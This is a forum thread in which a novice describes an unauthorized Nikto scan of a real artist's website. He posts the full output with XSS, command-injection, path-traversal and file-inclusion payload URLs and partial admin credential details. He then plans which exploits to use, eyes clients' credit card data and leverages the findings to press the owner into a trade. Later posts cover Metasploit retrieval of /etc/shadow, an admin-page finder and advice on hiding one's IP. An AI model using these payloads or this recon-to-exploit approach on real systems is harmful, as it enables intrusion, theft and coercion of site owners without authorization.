Forum Thread: My First Site Hack.

My First Site Hack.

Hello peeps, instead of posting in comments I decided to post a new thread in the forum. This way it will be easier to keep it organised. Also this is a site for noobs and sometimes it helps other noobs to see what other noobs are doing and the process they are going through to learn. I myself have been a teacher and have found that most people are afraid of asking questions in fear of looking stupid. Trust me this is not a problem I have. Ok down to business,

I did recon on my victim and am pretty sure he is not hacking savvy although he has skills with computers. With this information i decided to use Nikto as I am sure he does not have a IDS (intrusion detection system such as snort) in place. Now the web host might notice the scan but I am pretty sure he wont. Nikto results listed below

Server: Apache/2.2.26 (Unix) modssl/2.2.26 OpenSSL/1.0.1e-fips modauthpassthrough/2.1 modbwlimited/1.4 FrontPage/5.0.2.2635 modfcgid/2.3.6

  • Retrieved x-powered-by header: PHP/5.4.24
  • No CGI Directories found (use '-C all' to force check all possible dirs)
  • robots.txt contains 2 entries which should be manually viewed.
  • modssl/2.2.26 appears to be outdated (current is at least 2.8.31) (may depend on server version)
  • Number of sections in the version string differ from those in the database, the server reports: openssl/1.0.1e-fips while the database has: 1.0.0.100. This may cause false positives.
  • FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
  • DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
  • OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  • FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
  • modssl/2.2.26 OpenSSL/1.0.1e-fips modauthpassthrough/2.1 modbwlimited/1.4 FrontPage/5.0.2.2635 modfcgid/2.3.6 - modssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
  • OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
  • /servlet/webacc?User.html=noexist: Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.
  • OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&idcat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parentid=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=MembersList&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-2946: /forummembers.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-3092: /cart/: This might be interesting...
  • OSVDB-3092: /members/: This might be interesting...
  • OSVDB-3092: /register/: This might be interesting...
  • OSVDB-3092: /shop/: This might be interesting...
  • OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  • OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  • OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
  • OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@(i deleted this)', password file location 'ansdata/ans.passwd'
  • OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
  • OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
  • OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
  • OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
  • /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
  • OSVDB-3092: /license.txt: License file found may identify site software.
  • /wordpress/: A Wordpress installation was found.
  • 6448 items checked: 33 error(s) and 39 item(s) reported on remote host
  • End Time: 2014-03-30 14:50:10 (5524 seconds)

As you can see this guys site is a mess, I even know where his admin pw location is. And btw this guy has allot of wealthy (hes and artist also much more successful than i am) clients and they buy from him, can you say Credit Card info. I also got all his php info

I always like to start at the top of things so what I am seeing is that TRACE is on, which is a hack that I can learn and exploit. (already checked into xst) and allot of potential for xss hacks and not to mention hes running wordpress.

Full disclosure I have already emailed the victim informing him that he has been pen tested so have no intentions of actually hacking, I actually hope he contacts me for the information i gathered and I make a few bucks. I will post more in comments as I work on this site. I would ask for advice but i am noticing i never get any lol, experience is the great teacher I agree.

25 Responses

Good job, Jon!

I hope he doesn't call the FBI. Let us know what happens.

What, you cant do a Pen test on a site??? we have done them on facebook and many others.

You can't pentest without permission first.

OK i am confused, we have used different port scanning on Facebook, ect. So running Nikto on facebook is a crime

You are confusing vulnerability scan and pentest.

OK phew ya, I have been madly googling, yes I did word that wrong a pen test is actually making changes on the site, vulnerability or recon is not illegal. I did not do pen testing. I did a scan.

OWT I am thinking that just the scan info, with enough pentesting, (which I now know is also hacking just with the victims permission) knowledge can make a guy a few bucks on the side with out the risk of the feds knocking down your door.

Kinda why i started this thread, I am gonna break down each vulnerability and associate them with the hacks (pentest), again without using them if I don't get the victim(clients) permission. notice victim and client depends on if its a hack or a pentest.

Almost like using crypto locker without actually locking anything just the fear of being hacked

O.K. Back to share some of my studies. Other noobs you need to give me some Kudos I don't mind looking like an idiot but I should get "something" from it :) besides skills. (you can give Kudos by going to the top of the page and clicking the up arrow next to kudos, Yahhh thank you)

I will start at the first vulnerability: OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST.

I will cross reference any information I gain from this exploit and match it to any other vulnerabilities listed in nikto. This may help in indexing a hack and where i can take it, in other words how deep i can hack the system by using one hack combined with another.

Local search for "xst"= natha, local search for "trace hack" =natha Although I am reading some interesting posts by Joe Bradly, I may have to go through all those.

Gonna go Google now and see if I can find some better search terms for the local search. Results of "what is xst hack" and oooo some interesting results found here. http://www.hackforums.net/archive/index.php/thread-2952263.html

if you cannot read this page do some studying, (break it down to each command line makes it easier) I have nominal http, asp-php, java skills. Those expanded allot researching that page.

Now Nikto has already told me I have some xxs problems and java, could perhaps use them together? No worries I will try to tie them as I move down the list.

Update, I went through my emails and my target has agreed to give me access to over 2k of his tut's on creating art (which cost him nothing) in exchange for my scan. I will make, umm well allot of money on those tuts (hes good) I just saved or umm made 2k since i would of paid for that info. Grey hatting works

Very industrious Jon. Well done

Thanks guys, If you want me to post the process I went through with edited e mails let me know. At this point i have got him to agree to a trade, now as to if it actually goes through to completion that maybe a different story, right now I am pretty sure he doesn't like me so much, well you know how that goes, the bearer of bad news and I probably scare him a bit

Thank you Guilty sparks for the kudos, noobs unite. :)

I cant work on the next vulnerabilities as my ULTIMATE HACKING (ok also my ULTIMATE PHOTOSHOP CS6) sytem, see here for specs https://null-byte.wonderhowto.com/forum/hacking-computer-0152793/ has come in and I have been assembling it.

Man how hardware has changed in the last 30 years, I used to be able to assemble one in a few minutes.

I will try to work on the next vulnerability tomorrow and give an update here.

I am rethinking continuing this post. I started it because I used to teach and something few people know is that more often that not the teacher learns more than the student, so this was not a selfless act.

I will tell you what i did with the results above and perhaps if you want to take the time you can do it yourself. Check each of the scan results in the OSVDB data base found on their site, if your a baby script kiddie like me at the bottom of the page it shows if there is a metasploit for it. Metasploit allows for recon, scan and attack on a site. If the vulnerability does not appear on that site, DON'T ATTACK IT!! You are opening yourself up for a failure and possible liabilities.

Now just because Metasploit cant attack it does not mean that there are not scripts and tut's on how to. This is what you will have to study, and expand your skills to accomplish.

As far as I am concerned this thread is closed, If you have questions feel free to ask and I will answer

Jon Masters

Edited section below:

On advice from someone I respect, I will continue this thread, but I am going into artist season for the next few weeks and really have to focus on that. That is the money that will carry me for most of this year in a living style I am accustomed too. I have about 7 more pages of info covering the above in this post. I will post them as I have time.

AWESOME!! Thank you!! This was by far the most informative article I've ever come across. It's been very hard learning on my own. I don't have any friends to show me how either. Sad to hear you will be going away for awhile. Please keep those posts coming in as you get a chance. Because of this article I have signed up and bookmarked the page! Its so nice to see someone put so much effort into helping other people! You are prolly not an American. Thank you

Wow, thanks Emilie. Yes I am an american, just an old school one from a time when people were more helpful than now days. But On to the recon.

I have some time so going to go into it a bit more. I will not post all seven pages as I want you all to do some work and gain some skills, also as I have already broken down how to check each of the vulnerabilities.

My results show the following as being the most promising for my goal of cloning his site.

FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html

OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely

All the OSVDB-12184's, grabbing the php.info or basically all the txt files and free info he has up for the taking for further recon before even considering a hack.

Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html

OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@(i deleted this)', password file location 'ansdata/ans.passwd'

/wordpress/: A Wordpress installation was found.

Based on my findings I would begin the search for a hack starting with the most promising and easiest, word press, then front page, avengers, vbulletin and finally sips.

Next post will be on my search findings and how I found the hacks. It will take allot more work as finding the hacks is not the same as implementing them but ya, I can hack this guy.

I need a little help from the masters here to continue this thread. I have decided I like the sips vulnerabilities as my first attempt to hack, (again this is a learning exercise and I have no intentions of doing so) and the reason for it is based on this post http://www.backtrack-linux.org/forums/showthread.php?t=27622

I have been beating myself against a wall trying to reverse engineer how he discoverd to search for webmin in metasploit. Since I am a baby noob script kiddie if I was to hack this system I would have to use metasploit. All searches including searching for the cve for OSVDB-44056 have yielded no clues as to how he knew to use it. If you search securityfocus, osvdb, cve for that vulnerability they do not mention webmin. I even checked metasploit.com's data base. Now they do list cve's hes quoted in the post it does not list the OSVDB-44056 or related cve. :/ help

freaken mofo ya so simple:

I just fired up Metasploit and ran a search for webmin. I used the auxilary there in order to retrieve the /etc/passwd & /etc/shadow file. So simple. Consider this one solved.

could a told us how he did it.

I have to apologize for yesterdays outburst, but I was a bit frustrated.

Here is what I think he did. He did not use the sips exploit instead he just searched each vulnerabilities in metasploit to see if it had a listing then found webmin and ran it. I had expected something a little more brilliant since I had been working so hard on sips and not really found a solution, or its beyond my skills at this time.

I did the same for each of mine above and found several exploits to use. You can do the same by firing up metasploit enter for instance vbulleton and you will find 4 hacks that can be used against it.

O.K. guys this is as far as I can go with this. Actually testing the exploits would actually be doing a hack and I am much to unskilled to try it. I hope you all laughed a bit, said omg what a idiot, but most of all enjoyed following me on this journey through my first recon.

Gonna add here real quick, in fact I will as I find stuff but (snicker, snicker) you might ask "ok so your hack worked what do you do now?"

So lets say I found the Admin password I now need to find the page. Enter AdminPageFinder. You can dl the python scrip from here. http://chrystz.blogspot.com/2013/10/admin-page-finder-tool-version-20-most.htmlIts its in a basically if,then,else format and not too difficult to read. In fact I am studying it now to make additions to it and add it to my recon toolkit. I mean you do kinda have to know where the admin page is. :)

Decided I didn't really need this up

Jon, are you happy now? You wanted a kudo and I gave you one. I did this because you were about to fight with me, and I really didn't wanted that to happen, so instead of replying to your comments with bad words, I decided to give you a kudo. No more fighting as we both are friends, not enemies. The real enemy is out there, spying on us, not letting us browse the internet anonymously. I did my part, so now you should do yours, by giving me back my kudo. As far as the post is considered, I wrote it myself and took a lot of time writing it, because this was my first post on any blog. You are correct that if you see my past comments, and then look at my post, you will say that this man who doesn't even know how to make a bootable usb, makes an article about deleting an os and replacing it, without damaging the hard drive. This just can't be it. Someone else must have did it, but I assure you my friend that I wrote it. I am in the learning position, not a proper grown expert. I am really young but as time passes, my skills and info get increased. I hope we become friends again.

U31

Brilliant breakdown of a hack based on nikto recon kudos to you! though anymore noobs on here thinking of scanning every site on the web now be warned i scanned my old secondary school and got banned from connecting although it was through a VPN so it didn't really matter, just note your ip can be logged so please hide it to avoid any unwanted door knocks

i got the same result on website but i dont know how to use these informations

Share Your Thoughts

  • Hot
  • Active